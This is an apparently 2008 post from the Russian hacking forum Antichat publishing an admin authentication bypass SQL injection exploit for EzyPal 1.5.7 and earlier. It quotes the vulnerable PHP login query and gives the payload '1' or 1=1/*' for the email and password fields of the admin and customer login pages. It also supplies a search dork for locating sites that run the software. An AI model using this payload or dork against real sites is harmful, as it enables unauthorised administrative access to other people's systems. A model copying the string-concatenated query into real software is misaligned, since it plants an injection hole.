Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   EzyPal <= 1.5.7 Admin Authentication Bypass SQL Injection Exploit (https://forum.antichat.xyz/showthread.php?t=81287)

~!DoK_tOR!~ 17.08.2008 19:10
EzyPal <= 1.5.7 Admin Authentication Bypass SQL Injection Exploit
 
Author: ~!Dok_tOR!~
Product: EzyPal
Version: 1.5.7 возможно и более ранние версии
URL: www.ezypal.com
Vulnerability Class: SQL injection

1.

/[installdir]/admincp/index.php

Vuln Code:

PHP код:
$sql mysql_query("SELECT customer_email FROM ".$config['db_pref']."customers WHERE customer_email = '".$customer_email."' AND customer_password = '".md5($customer_pass)."' AND customer_level = 2") or ErrorDB(2,mysql_errno(),mysql_error()); 
magic_quotes_gpc = Off

Example:
http://[server]/[installdir]/admincp/index.php

Email Address: 1' or 1=1/*
Password: 1' or 1=1/*

2.

Example:
http://[server]/[installdir]/index.php?do=account

Email Address: 1' or 1=1/*
Password: 1' or 1=1/*

Dork:

Powered by EzyPal
Welcome :: EzyPal


Время: 19:59